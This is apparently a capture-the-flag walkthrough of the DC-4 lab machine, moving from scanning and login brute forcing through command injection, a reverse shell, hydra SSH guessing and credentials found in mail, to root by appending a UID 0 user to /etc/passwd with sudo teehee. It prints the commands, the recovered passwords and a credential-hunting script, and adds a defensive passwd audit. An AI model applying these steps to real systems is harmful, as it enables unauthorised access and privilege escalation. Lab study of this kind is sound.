Key takeaways
- Password brute forcing
- Searching for files that may contain passwords
- Privilege escalation by appending a new UID 0 user to /etc/passwd
Steps
Start with an nmap scan. The result is straightforward: only ports 22 and 80 are open. The OpenSSH 7.4p1 build on port 22 has known weaknesses, but none of them help in our situation, so the focus is port 80.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-13 09:37 UTC
Nmap scan report for 192.168.52.195
Host is up (0.0018s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 (RSA)
| 256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 (ECDSA)
|_ 256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b (ED25519)
80/tcp open http nginx 1.15.10
|_http-title: System Tools
|_http-server-header: nginx/1.15.10
Run nikto and a directory brute force against port 80:
C:\home\kali\Documents\OFFSEC\play\DC-4> cat nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.52.195
+ Target Hostname: 192.168.52.195
+ Target Port: 80
+ Start Time: 2024-12-13 09:38:25 (GMT0)
---------------------------------------------------------------------------
+ Server: nginx/1.15.10
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 8102 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2024-12-13 09:38:38 (GMT0) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.172.195
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/Web-Content/big.txt
[+] Negative Status codes: 502,404,429,503,400
[+] User Agent: gobuster/3.6
[+] Extensions: php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/command.php (Status: 302) [Size: 704] [--> index.php]
/css (Status: 301) [Size: 170] [--> http://192.168.172.195/css/]
/images (Status: 301) [Size: 170] [--> http://192.168.172.195/images/]
/index.php (Status: 200) [Size: 506]
/login.php (Status: 302) [Size: 206] [--> index.php]
/logout.php (Status: 302) [Size: 163] [--> index.php]
Progress: 40952 / 40954 (100.00%)
===============================================================
Finished
===============================================================
So port 80 serves a PHP application whose main files are command.php, index.php, login.php and logout.php. login.php is the login page, and command.php sends unauthenticated visitors back to index.php, which makes it the post-login functionality worth reaching. nikto also flagged /#wp-config.php#, but gobuster found no WordPress paths at all, so treat that hit as a probable false positive before spending time on it.
Open Burp Suite and brute-force the login form; admin / happy logs in successfully.
After a successful login the application redirects to command.php.
Looking at the request, the page simply submits a Linux command as a request parameter and executes it on the server. Send the request to Repeater, replace the command with a reverse shell payload, and catch the connection with a netcat listener (here listening on port 80).
From the reverse shell, /home/jim/backups/old-passwords.bak turns up; copy it back to the attacking machine to use as a wordlist.
C:\home\kali\Documents\OFFSEC\play\DC-4> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.206] from (UNKNOWN) [192.168.172.195] 48660
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/usr/share/nginx/html
cd /home/jim
ls -l
total 16
drwxr-xr-x 2 jim jim 4096 Apr 7 2019 backups
-rw-r--r-- 1 root root 33 Dec 13 21:42 local.txt
-rw------- 1 jim jim 528 Apr 6 2019 mbox
-rwxrwxrwx 1 jim jim 190 Dec 13 22:07 test.sh
cd backups
ls
old-passwords.bak
Brute-forcing SSH as jim with that list (saved locally here as password_list.txt) yields the password jibril04. hydra's warning is worth heeding: sshd caps the number of concurrent unauthenticated connections, so with 16 parallel tasks some attempts can be dropped and reported as failed guesses; -t 4 is slower but reliable.
C:\home\kali\Documents\OFFSEC\play\DC-4> hydra -l jim -P password_list.txt ssh://192.168.172.195
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-13 20:09:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 252 login tries (l:1/p:252), ~16 tries per task
[DATA] attacking ssh://192.168.172.195:22/
[STATUS] 214.00 tries/min, 214 tries in 00:01h, 41 to do in 00:01h, 13 active
[22][ssh] host: 192.168.172.195 login: jim password: jibril04
1 of 1 target successfully completed, 1 valid password found
With that password we can SSH in as jim, and the login banner says there is mail waiting:
C:\home\kali\Documents\OFFSEC\play\DC-4> ssh jim@192.168.172.195
The authenticity of host '192.168.172.195 (192.168.172.195)' can't be established.
ED25519 key fingerprint is SHA256:0CH/AiSnfSSmNwRAHfnnLhx95MTRyszFXqzT03sUJkk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.172.195' (ED25519) to the list of known hosts.
jim@192.168.172.195's password:
......
......
You have mail.
Last login: Sun Apr 7 02:23:55 2019 from 192.168.0.100
jim@dc-4:~$ sudo -l
The mbox file in jim's home is not very revealing by itself, but it is a hint that mail is worth checking more widely, so upload linpeas.sh and run it. Its mail section lists the spools (/var/spool/mail and /var/mail are the same directory on this box, as the identical inode numbers show):
╔══════════╣ Mails (limit 50)
9813 4 -rw-rw---- 1 jim mail 2425 Dec 13 22:13 /var/mail/jim
7653 4 -rw-rw---- 1 www-data mail 3516 Dec 13 22:04 /var/mail/www-data
9813 4 -rw-rw---- 1 jim mail 2425 Dec 13 22:13 /var/spool/mail/jim
7653 4 -rw-rw---- 1 www-data mail 3516 Dec 13 22:04 /var/spool/mail/www-data
Reading /var/mail/jim reveals charles's password:
jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
(envelope-from <charles@dc-4>)
id 1hCjIX-0000kO-Qt
for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O
Hi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ^xHhA&hvim0y
See ya,
Charles
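Rather than reading each spool by hand, the credential hunt across /var/mail can be automated. This is an added example, not part of the original write-up; SAMPLE_MBOX is constructed for offline use, with its first message reproducing the one found on the box and a second harmless message to show that the patterns do not fire on ordinary mail.

```python
"""Hunt for pasted credentials in mbox mail spools such as /var/mail/<user>.

Added example, not from the write-up. SAMPLE_MBOX is constructed for
offline use; only its first message mirrors what was on the box.
"""
import email
import re
import sys
from email.message import Message
from typing import Dict, Iterator, List

SAMPLE_MBOX = """\
From charles@dc-4 Sat Apr 06 21:15:46 2019
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is: ^xHhA&hvim0y

See ya,
Charles

From root@dc-4 Sat Apr 06 22:00:01 2019
To: jim@dc-4
Subject: Reminder
From: root@dc-4

Team meeting moved to Monday.
"""

# Loose "someone pasted a secret" patterns; tune per engagement.
CRED_PATTERNS = [
    re.compile(r"\bpass(?:word|wd|phrase)?\s*(?:is|:|=)\s*:?\s*(\S+)", re.IGNORECASE),
    re.compile(r"\b(?:pwd|secret|token|api[_-]?key)\s*[:=]\s*(\S+)", re.IGNORECASE),
]


def split_mbox(text: str) -> Iterator[Message]:
    """Split on the mbox envelope line 'From ' (note the space: header lines
    read 'From:') and parse each message with the email package."""
    current: List[str] = []
    for line in text.splitlines():
        if line.startswith("From ") and current:
            yield email.message_from_string("\n".join(current[1:]))
            current = []
        current.append(line)
    if current:
        yield email.message_from_string("\n".join(current[1:]))


def text_parts(msg: Message) -> Iterator[str]:
    """Yield decoded text/plain bodies, walking into multipart messages."""
    for part in msg.walk():
        if part.get_content_type() == "text/plain":
            payload = part.get_payload(decode=True) or b""
            yield payload.decode(part.get_content_charset() or "utf-8", errors="replace")


def find_credentials(mbox_text: str) -> List[Dict[str, str]]:
    """Return one hit per matched secret, with sender and subject for context."""
    hits: List[Dict[str, str]] = []
    for msg in split_mbox(mbox_text):
        for body in text_parts(msg):
            for pattern in CRED_PATTERNS:
                for match in pattern.finditer(body):
                    hits.append({
                        "from": msg.get("From", ""),
                        "subject": msg.get("Subject", ""),
                        "secret": match.group(1),
                    })
    return hits


if __name__ == "__main__":
    # Usage: python3 mail_creds.py /var/mail/jim /var/mail/www-data ...
    # With no arguments the constructed sample is scanned.
    sources = sys.argv[1:] or ["<sample>"]
    for src in sources:
        text = SAMPLE_MBOX if src == "<sample>" else open(src, errors="replace").read()
        for hit in find_credentials(text):
            print(f"{src}: {hit['from']} / {hit['subject']}: {hit['secret']}")
```

Real spools escape body lines that begin with "From " as ">From ", which is why splitting on the bare envelope line is safe; the mail group membership shown by linpeas (rw-rw---- owner plus group mail) is what decides which of these files a given user can actually read.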
Use that password to su to charles; sudo -l shows that charles may run /usr/bin/teehee as root without a password:
charles@dc-4:/var/mail$ sudo -l
Matching Defaults entries for charles on dc-4:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User charles may run the following commands on dc-4:
(root) NOPASSWD: /usr/bin/teehee
Experimentation, and the --help text, which is word for word that of coreutils tee, show that teehee copies standard input to the files named on its command line, appending with -a. Run as root through sudo, that is an arbitrary append to any file, so we can add a line to /etc/passwd:
charles@dc-4:~$ /usr/bin/teehee --help
Usage: /usr/bin/teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.
-a, --append append to the given FILEs, do not overwrite
-i, --ignore-interrupts ignore interrupt signals
-p diagnose errors writing to non pipes
--output-error[=MODE] set behavior on write error. See MODE below
--help display this help and exit
--version output version information and exit
First create a password hash with openssl passwd (the 13-character output is traditional DES crypt, which only uses the first eight characters of the password; -1 or -6 would select a stronger scheme), then append a line defining a user tim with UID 0 and GID 0 and switch to it. Because the second field holds a hash rather than x, login verifies the password against /etc/passwd directly and never consults /etc/shadow, which is why no write to /etc/shadow is needed; since /etc/passwd is world-readable, anyone on the box can also crack that hash offline.
charles@dc-4:~$ openssl passwd 1234
HQpXGqbwWyrdo
charles@dc-4:~$ sudo /usr/bin/teehee -a /etc/passwd
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
charles@dc-4:~$ su tim
Password:
root@dc-4:/home/charles# cat /root/proof.txt
eb471b16059fc83e6f3cf3900b73be38
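The same trick is easy to spot from the defender's side, because everything it needs is visible in /etc/passwd. Below is an added example, not part of the original write-up, that audits a passwd file for the signs of this backdoor and a few relatives: extra UID 0 accounts, hashes stored inline instead of in /etc/shadow, empty password fields, duplicate names and malformed lines. SAMPLE_PASSWD is constructed for offline use; only its last line is the entry appended above with teehee.

```python
"""Audit /etc/passwd for the UID 0 / inline-hash backdoor pattern.

Added example, not from the write-up. SAMPLE_PASSWD is constructed; only
the final line is the one the write-up appends with teehee.
"""
import sys
from typing import List, Set, Tuple

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
jim:x:1001:1001:jim,,,:/home/jim:/bin/bash
tim:HQpXGqbwWyrdo:0:0:root:/root:/bin/bash
"""

# Password-field values that defer to /etc/shadow or mark the account locked.
DEFER_OR_LOCKED = {"x", "*", "!", "!!", "*NP*"}

Finding = Tuple[str, str]  # (account or line reference, description)


def audit_passwd(text: str) -> List[Finding]:
    """Flag entries that grant root or bypass /etc/shadow."""
    findings: List[Finding] = []
    seen: Set[str] = set()
    for lineno, raw in enumerate(text.splitlines(), 1):
        if not raw.strip():
            continue
        fields = raw.split(":")
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            findings.append((f"line {lineno}",
                             "malformed entry (expected name:pw:uid:gid:gecos:home:shell)"))
            continue
        name, pw, uid, _gid, _gecos, _home, _shell = fields
        if name in seen:
            findings.append((name, "duplicate account name"))
        seen.add(name)
        if pw == "":
            findings.append((name, "empty password field: no password needed to log in"))
        elif pw not in DEFER_OR_LOCKED and not pw.startswith("!"):
            # Not 'x': login checks this hash directly, /etc/shadow is never consulted,
            # and the world-readable hash can be cracked offline by any local user.
            findings.append((name, "password hash stored inline in /etc/passwd"))
        if uid == "0" and name != "root":
            findings.append((name, "UID 0 account that is not root"))
    return findings


if __name__ == "__main__":
    # Usage: python3 passwd_audit.py [/etc/passwd]; with no argument the sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for who, why in audit_passwd(text):
        print(f"{who}: {why}")
```

Run against the sample it reports tim twice, once for UID 0 and once for the inline hash. In a monitoring setup the same event is also caught by the write itself: an auditd watch or file-integrity check on /etc/passwd fires on the append, and the sudo log records charles running teehee as root.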
Personal take
Overall the box is not hard, but it has many steps and a few detours, the login brute force above all. Given the network and the throttling in Burp Suite Community Edition, only a small wordlist is practical; with rockyou it would still be running the next morning. In an exam setting I would avoid password brute forcing where possible, and large dictionaries in particular.